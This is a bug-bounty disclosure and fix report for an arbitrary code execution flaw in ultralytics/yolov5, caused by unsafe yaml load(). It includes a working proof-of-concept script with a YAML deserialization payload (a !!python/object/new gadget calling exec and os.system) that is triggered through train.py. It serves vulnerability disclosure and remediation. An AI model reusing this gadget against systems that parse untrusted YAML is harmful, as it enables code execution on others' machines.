RCE-fixed

[Anon-Artist]

📊 Metadata *

Arbitrary Code Excecution in ultralytics/yolov5. Yolov5 is a Object Detection model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services, spanning from simple expert advice up to delivery of fully customized, end-to-end production solutions.

Bounty URL: https://www.huntr.dev/bounties/1-other-yolov5

⚙️ Description *

This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load() in yaml.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import os
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
os.system('git clone https://github.com/ultralytics/yolov5.git')
os.chdir('yolov5/')
os.system('rm exploit.yml')
open('exploit.yml','w+').write(exploit)
os.system('python train.py --data exploit.yml --cfg exploit.yml --weights "" --batch-size 24')

Execute the following commands in another terminal:

python3 exploit.py

Check the Output:

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

[mzfr]

LGTM!

[Mik317]

LGTM 😄 🍰

Cheers,
Mik

[huntr-helper]

Congratulations Anon-Artist - your fix has been selected! 🎉

Thanks for being part of the community & helping secure the world's open source code.
If you have any questions, please respond in the comments section, or hit us up on Discord. Your bounty is on its way - keep hunting!

Come join us on Discord